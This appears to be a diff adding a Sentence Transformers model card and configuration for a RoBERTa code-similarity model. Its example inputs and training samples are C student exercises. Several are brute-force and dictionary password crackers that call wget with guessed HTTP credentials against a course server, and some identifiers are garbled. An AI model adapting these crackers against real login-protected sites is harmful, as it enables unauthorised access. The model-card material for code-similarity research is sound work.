+ '\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n#define MAX_SIZE 255\n\n\nint (int argc, char *argv[])\n {\n FILE *fp;\n \n while(1)\n { \n system("wget -p http://www.cs.rmit.edu./students");\n\n\n\n system("mkdir data"); \n if((fp=fopen("./data/index.html","r"))==NULL)\n { \n system("cp www.cs.rmit.edu./students/index.html ./data");\n\t \n }\n else\n { \n \n\t \n\t system("diff ./data/index.html www.cs.rmit.edu./students/index.html | mail @cs.rmit.edu.");\n\t system("cp www.cs.rmit.edu./students/index.html ./data");\n } \n\n\n\n system("mkdir images"); \n if((fp=fopen("./images/file.txt","r"))==NULL)\n { \n system("md5sum www.cs.rmit.edu./images/*.* > ./images/file.txt");\n\t\t \n }\n \n else\n { \n system("md5sum www.cs.rmit.edu./images/*.* > www.cs.rmit.edu./file.txt");\n\t \n\t \n\t \n\t system("diff ./images/file.txt www.cs.rmit.edu./file.txt | mail @cs.rmit.edu.");\n\t system("cp www.cs.rmit.edu./file.txt ./images");\n }\n sleep(86400); \n }\t\n return (EXIT_SUCCESS);\n }\n \n\t \n\t \t\n',
572
+ '\n\n#include <stdio.h>\n#include <string.h>\n#include <sys/time.h>\n\n#define OneBillion 1e9\n#define false 0\n#define true 1\nint execPassword(char *, char *b) {\n\n\n char [100]={\'\\0\'};\n strcpy(,b);\n \n strcat(,);\n printf ("Sending command %s\\n",);\n if ( system()== 0) {\n printf ("\\n password is : %s",);\n return 1;\n }\n return 0;\n}\n \n\nint bruteForce(char [],char comb[],char *url) {\n\n\nint i,j,k;\n\n for(i=0;i<52 ;i++) {\n comb[0]= [i];\n if (execPassword(comb,url)== 1) return 1; \n for(j=0;j<52;j++) {\n comb[1] = [j];\n if(execPassword(comb,url)==1) return 1;\n for(k=0;k<52;k++) {\n comb[2] = [k];\n if(execPassword(comb,url)==1) return 1;\n }\n comb[1] = \'\\0\';\n }\n }\n return 0;\n\n} \n\nint (char *argc, char *argv[]) {\n\n int i,j,k;\n char strin[80] = {\'\\0\'};\n char *passwd;\n char a[] = {\'a\',\'b\',\'c\',\'d\',\'e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\',\'A\',\'B\',\'C\',\'D\',\'E\',\'F\',\'G\',\'H\',\'K\',\'L\',\'M\',\'N\',\'O\',\'P\',\'Q\',\'R\',\'S\',\'T\',\'U\',\'V\',\'W\',\'X\',\'Y\',\'Z\'};\n char v[4]={\'\\0\'};\n int startTime, stopTime, final;\n int flag=false; \n strcpy(strin,"wget http://sec-crack.cs.rmit.edu./SEC/2/ --http-user= --http-passwd=");\n\n startTime = time();\n if (bruteForce(a,v,strin)==1) {\n stopTime = time();\n final = stopTime-startTime;\n }\n\n printf ("\\n The password is : %s",v);\n printf("%lld nanoseconds (%lf) seconds \\n", final, (double)final/OneBillion );\n\n}\n',
573
+ ]
574
+ embeddings = model.encode(sentences)
575
+ print(embeddings.shape)
576
+ # [3, 768]
577
+
578
+ # Get the similarity scores for the embeddings
579
+ similarities = model.similarity(embeddings, embeddings)
580
+ print(similarities)
581
+ # tensor([[1.0000, 0.9892, 0.9953],
582
+ # [0.9892, 1.0000, 0.9908],
583
+ # [0.9953, 0.9908, 1.0000]])
584
+ ```
585
+
586
+ <!--
587
+ ### Direct Usage (Transformers)
588
+
589
+ <details><summary>Click to see the direct usage in Transformers</summary>
590
+
591
+ </details>
592
+ -->
593
+
594
+ <!--
595
+ ### Downstream Usage (Sentence Transformers)
596
+
597
+ You can finetune this model on your own dataset.
598
+
599
+ <details><summary>Click to expand</summary>
600
+
601
+ </details>
602
+ -->
603
+
604
+ <!--
605
+ ### Out-of-Scope Use
606
+
607
+ *List how the model may foreseeably be misused and address what users ought not to do with the model.*
608
+ -->
609
+
610
+ <!--
611
+ ## Bias, Risks and Limitations
612
+
613
+ *What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
614
+ -->
615
+
616
+ <!--
617
+ ### Recommendations
618
+
619
+ *What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
620
+ -->
621
+
622
+ ## Training Details
623
+
624
+ ### Training Dataset
625
+
626
+ #### Unnamed Dataset
627
+
628
+ * Size: 3,081 training samples
629
+ * Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code>
630
+ * Approximate statistics based on the first 1000 samples:
631
+ | | sentence_0 | sentence_1 | label |
632
+ |:--------|:--------------------------------------------------------------------------------------|:--------------------------------------------------------------------------------------|:-----------------------------------------------|
633
+ | type | string | string | int |
634
+ | details | <ul><li>min: 194 tokens</li><li>mean: 471.57 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 194 tokens</li><li>mean: 458.65 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~99.20%</li><li>1: ~0.80%</li></ul> |
635
+ * Samples:
636
+ | sentence_0 | sentence_1 | label |
637
+ |:-----------|:-----------|:------|
638
+ | <code>#include <strings.h><br>#include <string.h><br>#include <ctype.h><br>#include<sys/time.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <sys/times.h><br><br><br><br>int ()<br>{<br> int i,j,k,syst;<br> char password[4],first[100],last[100];<br> int count =0; <br> char arr[52] ={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',<br> 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};<br> strcpy(first, "wget --http-user= --http-passwd=");<br> strcpy(last, " http://sec-crack.cs.rmit.edu./SEC/2/");<br> int Start_time,End_time,Total_time,average; <br> Start_time = time();<br>printf(" Time =%11dms\n", Start_time);<br> for (i=0;i<=52;i++)<br> {<br> for (j=0;j<=52;j++)<br> {<br> for(k=0;k<=52;k++)<br> {<br> password[0] = arr[i];<br> password[1] = arr[j];<br> password[2] = arr[k];<br> password[3] = '\0';<br> printf(" The Combination of the password tried %s \n" ,password);<br> printf("*...</code> | <code>#include <stdio.h><br>#include <stdlib.h><br>#include <sys/times.h><br>#include <strings.h><br>#include <string.h><br>#include <ctype.h><br><br><br><br>int ()<br>{<br> int i,j,k,sysoutput;<br> char pass[4],b[50], a[50],c[51] ,[2],string1[100],string2[100],temp1[3];<br> char arr[52] ={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',<br> 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};<br> strcpy(string1, "wget --http-user= --http-passwd=");<br> strcpy(string2, " http://sec-crack.cs.rmit.edu./SEC/2/");<br> <br> for (i=0;i<=52;i++)<br> { <br> [0] = arr[i];<br> [1] ='\0'; <br> strcpy(a,);<br> <br> printf("The first value is %s \n", a); <br><br> for (j=0;j<=52;j++)<br> { [0] = arr[j];<br> [1] = '\0'; <br> strcpy(temp1,a);<br> strcat(a,);<br> strcpy(b,a);<br> strcpy(a,temp1);<br> printf("The second value is %s \n", b); <br> 
for(k=0;k<=52;k++)<br> { <br> [0] =arr[k];<br> [1] = '\0...</code> | <code>1</code> |
639
+ | <code>#include<stdio.h><br>#include<string.h><br>#include<strings.h><br>#include<stdlib.h><br>#include<sys/time.h><br><br>()<br>{<br> int i,m,k,count=0;<br> FILE* diction;<br> FILE* log;<br> char s[30];<br> char pic[30];<br> char add[1000];<br> char end[100];<br> time_t ,finish;<br> double ttime;<br> <br> strcpy(add,"wget --http-user= --http-passwd=");<br> strcpy( end,"-nv -o logd http://sec-crack.cs.rmit.edu./SEC/2/");<br> diction=fopen("/usr/share/lib/dict/words","r");<br> =time(NULL);<br> while(fgets(s,100,diction)!=NULL) <br> { <br> printf("%s\n",s);<br> for(m=40,k=0;k<(strlen(s)-1);k++,m++)<br> {<br> add[m]=s[k];<br> }<br> add[m++]=' ';<br> for(i=0;i<50;i++,m++)<br> {<br> add[m]=end[i];<br> }<br> add[m]='\0';<br> <br> system(add);<br> count++;<br> log=fopen("logd","r");<br> fgets(pic,100,log);<br> printf("%s",pic);<br> if(strcmp(pic,"Authorization failed.\n")!=0) <br> {<br> finish=time(NULL);<br> ttime=difftime(,finish);<br> printf( "\n The time_var take:%f/n The of passwords tried is %d\n",ttime,count);<br> break;<br> }<br> fclose(log);<br> }<br><br>}<br></code> | <code><br><br><br><br>#include <stdio.h><br>#include <stdlib.h><br>#include <time.h><br><br>int () <br>{<br> int i,j,k,cntr=0;<br> char pass[3];<br> char password[3];<br> char get[96];<br> char username[]="";<br> int R_VALUE;<br> double time_used;<br> <br> clock_t ,end; <br> <br> =clock(); <br> <br> <br> <br> for (i = 65; i <= 122; i++)<br> {<br> if(i==91) {i=97;}<br> <br> for (j = 65; j <= 122; j++)<br> {<br> if(j==91) {j=97;}<br> <br> for (k = 65; k <= 122; k++)<br> {<br> if(k==91) {k=97;} <br> <br> pass[0] = i;<br> pass[1] = j;<br> pass[2] = k;<br> sprintf(password,"%c%c%c",pass[0],pass[1],pass[2]); <br> cntr++;<br> <br> printf("%d )%s\n\n", cntr, password);<br> sprintf(get,"wget --non-verbose --http-user=%s --http-passwd=%s http://sec-crack.cs.rmit.edu./SEC/2/",username,password);<br> <br><br> R_VALUE=system(get);<br> <br> if(R_VALUE==0) <br> {<br> printf("The Password has been cracked and 
it is : %s" , password);<br> ...</code> | <code>0</code> |
640
+ | <code><br><br> <br> <br><br><br>#include<stdio.h><br>#include<stdlib.h><br>#include<string.h><br><br> <br> int ()<br> {<br> char url[30];<br> int exitValue=-1;<br> FILE *fr;<br><br> char s[300]; <br> system("rm index.html*");<br> system("wget http://www.cs.rmit.edu./students/ "); <br> system("mv index.html one.html");<br> <br> printf("System completed Writing\n"); <br> system("sleep 3600");<br> <br> <br> system("wget http://www.cs.rmit.edu./students/ "); <br> <br> <br> <br> exitValue=system("diff one.html index.html > .out" );<br> <br> fr=fopen(".out","r");<br> <br> strcpy(s,"mailx -s \"Testing Again\"");<br> <br> strcat(s," < .out");<br> if(fgets(url,30,fr))<br> {<br> system(s);<br> <br> system("rm one.html"); <br> <br> printf("\nCheck your mail") ; <br> fclose(fr); <br> }<br> else<br> {<br> printf(" changes detected"); <br> <br> system("rm one.html"); <br> fc...</code> | <code>#include<stdio.h><br>#include<stdlib.h><br>#include<string.h><br>#include<ctype.h><br>#include<time.h><br><br>int ()<br>{<br><br> int m,n,o,i;<br> time_t u1,u2;<br> char v[3];<br> char temp1[100];<br> char temp2[100];<br> char temp3[250];<br> FILE *fin1;<br> <br> char point[25];<br> fin1=fopen("./words.txt","r");<br> <br> if(fin1==NULL)<br> {<br> printf(" open the file ");<br> exit(0);<br> } <br> <br><br> strcpy(temp2," --http-user= --http-passwd=");<br> strcpy(temp1,"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php");<br> <br> strcpy(temp3,"");<br> <br> (void) time(&u1); <br> <br> while(!feof(fin1)) <br> {<br> <br> fgets(point,25,fin1);<br> if(strlen(point)<=4)<br> {<br> <br> <br> strcpy(temp3,temp1);<br> strcat(temp3,temp2);<br> strcat(temp3,point);<br> printf("\nSending the %s\n",temp3);<br> i=system(temp3); <br> <br> if(i==0)<br> {<br> (void) time(&u2); <br> printf("\n The password is %s\n",point);<br> printf("\n\nThe time_var taken crack the passwork is %d second\n\n",(int)(u2-u1));<br> exit(0);<br> } <br> else<br> {<br> strcpy(temp3,"");<br> }<br> <br> <br> }<br> }<br> <br> 
<br>} ...</code> | <code>0</code> |
641
+ * Loss: [<code>BatchAllTripletLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#batchalltripletloss)
642
+
643
+ ### Training Hyperparameters
644
+ #### Non-Default Hyperparameters
645
+
646
+ - `per_device_train_batch_size`: 16
647
+ - `per_device_eval_batch_size`: 16
648
+ - `num_train_epochs`: 1
649
+ - `fp16`: True
650
+ - `multi_dataset_batch_sampler`: round_robin
651
+
652
+ #### All Hyperparameters
653
+ <details><summary>Click to expand</summary>
654
+
655
+ - `overwrite_output_dir`: False
656
+ - `do_predict`: False
657
+ - `eval_strategy`: no
658
+ - `prediction_loss_only`: True
659
+ - `per_device_train_batch_size`: 16
660
+ - `per_device_eval_batch_size`: 16
661
+ - `per_gpu_train_batch_size`: None
662
+ - `per_gpu_eval_batch_size`: None
663
+ - `gradient_accumulation_steps`: 1
664
+ - `eval_accumulation_steps`: None
665
+ - `torch_empty_cache_steps`: None
666
+ - `learning_rate`: 5e-05
667
+ - `weight_decay`: 0.0
668
+ - `adam_beta1`: 0.9
669
+ - `adam_beta2`: 0.999
670
+ - `adam_epsilon`: 1e-08
671
+ - `max_grad_norm`: 1
672
+ - `num_train_epochs`: 1
673
+ - `max_steps`: -1
674
+ - `lr_scheduler_type`: linear
675
+ - `lr_scheduler_kwargs`: {}
676
+ - `warmup_ratio`: 0.0
677
+ - `warmup_steps`: 0
678
+ - `log_level`: passive
679
+ - `log_level_replica`: warning
680
+ - `log_on_each_node`: True
681
+ - `logging_nan_inf_filter`: True
682
+ - `save_safetensors`: True
683
+ - `save_on_each_node`: False
684
+ - `save_only_model`: False
685
+ - `restore_callback_states_from_checkpoint`: False
686
+ - `no_cuda`: False
687
+ - `use_cpu`: False
688
+ - `use_mps_device`: False
689
+ - `seed`: 42
690
+ - `data_seed`: None
691
+ - `jit_mode_eval`: False
692
+ - `use_ipex`: False
693
+ - `bf16`: False
694
+ - `fp16`: True
695
+ - `fp16_opt_level`: O1
696
+ - `half_precision_backend`: auto
697
+ - `bf16_full_eval`: False
698
+ - `fp16_full_eval`: False
699
+ - `tf32`: None
700
+ - `local_rank`: 0
701
+ - `ddp_backend`: None
702
+ - `tpu_num_cores`: None
703
+ - `tpu_metrics_debug`: False
704
+ - `debug`: []
705
+ - `dataloader_drop_last`: False
706
+ - `dataloader_num_workers`: 0
707
+ - `dataloader_prefetch_factor`: None
708
+ - `past_index`: -1
709
+ - `disable_tqdm`: False
710
+ - `remove_unused_columns`: True
711
+ - `label_names`: None
712
+ - `load_best_model_at_end`: False
713
+ - `ignore_data_skip`: False
714
+ - `fsdp`: []
715
+ - `fsdp_min_num_params`: 0
716
+ - `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
717
+ - `fsdp_transformer_layer_cls_to_wrap`: None
718
+ - `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
719
+ - `deepspeed`: None
720
+ - `label_smoothing_factor`: 0.0
721
+ - `optim`: adamw_torch
722
+ - `optim_args`: None
723
+ - `adafactor`: False
724
+ - `group_by_length`: False
725
+ - `length_column_name`: length
726
+ - `ddp_find_unused_parameters`: None
727
+ - `ddp_bucket_cap_mb`: None
728
+ - `ddp_broadcast_buffers`: False
729
+ - `dataloader_pin_memory`: True
730
+ - `dataloader_persistent_workers`: False
731
+ - `skip_memory_metrics`: True
732
+ - `use_legacy_prediction_loop`: False
733
+ - `push_to_hub`: False
734
+ - `resume_from_checkpoint`: None
735
+ - `hub_model_id`: None
736
+ - `hub_strategy`: every_save
737
+ - `hub_private_repo`: None
738
+ - `hub_always_push`: False
739
+ - `gradient_checkpointing`: False
740
+ - `gradient_checkpointing_kwargs`: None
741
+ - `include_inputs_for_metrics`: False
742
+ - `include_for_metrics`: []
743
+ - `eval_do_concat_batches`: True
744
+ - `fp16_backend`: auto
745
+ - `push_to_hub_model_id`: None
746
+ - `push_to_hub_organization`: None
747
+ - `mp_parameters`:
748
+ - `auto_find_batch_size`: False
749
+ - `full_determinism`: False
750
+ - `torchdynamo`: None
751
+ - `ray_scope`: last
752
+ - `ddp_timeout`: 1800
753
+ - `torch_compile`: False
754
+ - `torch_compile_backend`: None
755
+ - `torch_compile_mode`: None
756
+ - `include_tokens_per_second`: False
757
+ - `include_num_input_tokens_seen`: False
758
+ - `neftune_noise_alpha`: None
759
+ - `optim_target_modules`: None
760
+ - `batch_eval_metrics`: False
761
+ - `eval_on_start`: False
762
+ - `use_liger_kernel`: False
763
+ - `eval_use_gather_object`: False
764
+ - `average_tokens_across_devices`: False
765
+ - `prompts`: None
766
+ - `batch_sampler`: batch_sampler
767
+ - `multi_dataset_batch_sampler`: round_robin
768
+ - `router_mapping`: {}
769
+ - `learning_rate_mapping`: {}
770
+
771
+ </details>
772
+
773
+ ### Framework Versions
774
+ - Python: 3.11.13
775
+ - Sentence Transformers: 5.0.0
776
+ - Transformers: 4.52.4
777
+ - PyTorch: 2.6.0+cu124
778
+ - Accelerate: 1.8.1
779
+ - Datasets: 3.6.0
780
+ - Tokenizers: 0.21.2
781
+
782
+ ## Citation
783
+
784
+ ### BibTeX
785
+
786
+ #### Sentence Transformers
787
+ ```bibtex
788
+ @inproceedings{reimers-2019-sentence-bert,
789
+ title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
790
+ author = "Reimers, Nils and Gurevych, Iryna",
791
+ booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
792
+ month = "11",
793
+ year = "2019",
794
+ publisher = "Association for Computational Linguistics",
795
+ url = "https://arxiv.org/abs/1908.10084",
796
+ }
797
+ ```
798
+
799
+ #### BatchAllTripletLoss
800
+ ```bibtex
801
+ @misc{hermans2017defense,
802
+ title={In Defense of the Triplet Loss for Person Re-Identification},
803
+ author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
804
+ year={2017},
805
+ eprint={1703.07737},
806
+ archivePrefix={arXiv},
807
+ primaryClass={cs.CV}
808
+ }
809
+ ```
810
+
811
+ <!--
812
+ ## Glossary
813
+
814
+ *Clearly define terms in order to be accessible across audiences.*
815
+ -->
816
+
817
+ <!--
818
+ ## Model Card Authors
819
+
820
+ *Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
821
+ -->
822
+
823
+ <!--
824
+ ## Model Card Contact
825
+
826
+ *Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
827
+ -->
config.json ADDED
@@ -0,0 +1,27 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "architectures": [
3
+ "RobertaModel"
4
+ ],
5
+ "attention_probs_dropout_prob": 0.1,
6
+ "bos_token_id": 0,
7
+ "classifier_dropout": null,
8
+ "eos_token_id": 2,
9
+ "hidden_act": "gelu",
10
+ "hidden_dropout_prob": 0.1,
11
+ "hidden_size": 768,
12
+ "initializer_range": 0.02,
13
+ "intermediate_size": 3072,
14
+ "layer_norm_eps": 1e-05,
15
+ "max_position_embeddings": 514,
16
+ "model_type": "roberta",
17
+ "num_attention_heads": 12,
18
+ "num_hidden_layers": 12,
19
+ "output_past": true,
20
+ "pad_token_id": 1,
21
+ "position_embedding_type": "absolute",
22
+ "torch_dtype": "float32",
23
+ "transformers_version": "4.52.4",
24
+ "type_vocab_size": 1,
25
+ "use_cache": true,
26
+ "vocab_size": 50265
27
+ }
config_sentence_transformers.json ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "model_type": "SentenceTransformer",
3
+ "__version__": {
4
+ "sentence_transformers": "5.0.0",
5
+ "transformers": "4.52.4",
6
+ "pytorch": "2.6.0+cu124"
7
+ },
8
+ "prompts": {
9
+ "query": "",
10
+ "document": ""
11
+ },
12
+ "default_prompt_name": null,
13
+ "similarity_fn_name": "cosine"
14
+ }
merges.txt ADDED
The diff for this file is too large to render. See raw diff
 
model.safetensors ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:25916e4dd9e51f4101337629a68e231c207326859f0dcdaa5c2ac7ba18841969
3
+ size 498604904
modules.json ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [
2
+ {
3
+ "idx": 0,
4
+ "name": "0",
5
+ "path": "",
6
+ "type": "sentence_transformers.models.Transformer"
7
+ },
8
+ {
9
+ "idx": 1,
10
+ "name": "1",
11
+ "path": "1_Pooling",
12
+ "type": "sentence_transformers.models.Pooling"
13
+ }
14
+ ]
sentence_bert_config.json ADDED
@@ -0,0 +1,4 @@
 
 
 
 
 
1
+ {
2
+ "max_seq_length": 512,
3
+ "do_lower_case": false
4
+ }
special_tokens_map.json ADDED
@@ -0,0 +1,51 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "bos_token": {
3
+ "content": "<s>",
4
+ "lstrip": false,
5
+ "normalized": true,
6
+ "rstrip": false,
7
+ "single_word": false
8
+ },
9
+ "cls_token": {
10
+ "content": "<s>",
11
+ "lstrip": false,
12
+ "normalized": true,
13
+ "rstrip": false,
14
+ "single_word": false
15
+ },
16
+ "eos_token": {
17
+ "content": "</s>",
18
+ "lstrip": false,
19
+ "normalized": true,
20
+ "rstrip": false,
21
+ "single_word": false
22
+ },
23
+ "mask_token": {
24
+ "content": "<mask>",
25
+ "lstrip": true,
26
+ "normalized": false,
27
+ "rstrip": false,
28
+ "single_word": false
29
+ },
30
+ "pad_token": {
31
+ "content": "<pad>",
32
+ "lstrip": false,
33
+ "normalized": true,
34
+ "rstrip": false,
35
+ "single_word": false
36
+ },
37
+ "sep_token": {
38
+ "content": "</s>",
39
+ "lstrip": false,
40
+ "normalized": true,
41
+ "rstrip": false,
42
+ "single_word": false
43
+ },
44
+ "unk_token": {
45
+ "content": "<unk>",
46
+ "lstrip": false,
47
+ "normalized": true,
48
+ "rstrip": false,
49
+ "single_word": false
50
+ }
51
+ }
tokenizer.json ADDED
The diff for this file is too large to render. See raw diff
 
tokenizer_config.json ADDED
@@ -0,0 +1,58 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "add_prefix_space": false,
3
+ "added_tokens_decoder": {
4
+ "0": {
5
+ "content": "<s>",
6
+ "lstrip": false,
7
+ "normalized": true,
8
+ "rstrip": false,
9
+ "single_word": false,
10
+ "special": true
11
+ },
12
+ "1": {
13
+ "content": "<pad>",
14
+ "lstrip": false,
15
+ "normalized": true,
16
+ "rstrip": false,
17
+ "single_word": false,
18
+ "special": true
19
+ },
20
+ "2": {
21
+ "content": "</s>",
22
+ "lstrip": false,
23
+ "normalized": true,
24
+ "rstrip": false,
25
+ "single_word": false,
26
+ "special": true
27
+ },
28
+ "3": {
29
+ "content": "<unk>",
30
+ "lstrip": false,
31
+ "normalized": true,
32
+ "rstrip": false,
33
+ "single_word": false,
34
+ "special": true
35
+ },
36
+ "50264": {
37
+ "content": "<mask>",
38
+ "lstrip": true,
39
+ "normalized": false,
40
+ "rstrip": false,
41
+ "single_word": false,
42
+ "special": true
43
+ }
44
+ },
45
+ "bos_token": "<s>",
46
+ "clean_up_tokenization_spaces": false,
47
+ "cls_token": "<s>",
48
+ "eos_token": "</s>",
49
+ "errors": "replace",
50
+ "extra_special_tokens": {},
51
+ "mask_token": "<mask>",
52
+ "model_max_length": 512,
53
+ "pad_token": "<pad>",
54
+ "sep_token": "</s>",
55
+ "tokenizer_class": "RobertaTokenizer",
56
+ "trim_offsets": true,
57
+ "unk_token": "<unk>"
58
+ }
vocab.json ADDED
The diff for this file is too large to render. See raw diff